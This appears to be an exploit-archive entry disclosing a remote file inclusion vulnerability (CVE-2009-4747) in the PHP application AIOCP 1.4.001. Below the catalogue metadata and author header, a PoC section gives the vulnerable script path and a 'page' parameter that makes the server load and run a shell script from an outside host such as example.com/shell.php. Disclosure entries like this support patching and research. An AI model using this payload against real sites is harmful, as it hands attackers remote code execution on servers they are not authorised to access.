AIOCP 1.4.001 - Remote File Inclusion
Author: Hadi Kiamarsi
type: webapps
platform: php
port:
date_added: 2009-10-06
date_updated: 2016-09-05
verified: 1
codes: CVE-2009-4747;OSVDB-62606
tags:
aliases:
screenshot_url:
application_url:
###########################################
#
# Aiocp 1.4.001 Remote File Inclusion vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://sourceforge.net/projects/aiocp/files/aiocp/AIOCP%201.4.001/aiocp_1_4_001.zip/download
#
###########################################
PoC :
http://[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=[SHELL]
example :
http://[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=http://www.example.com/shell.php
local Example :
http://localhost/root/public/code/cp_html2xhtmlbasic.php?page=http://127.0.0.1/shell.php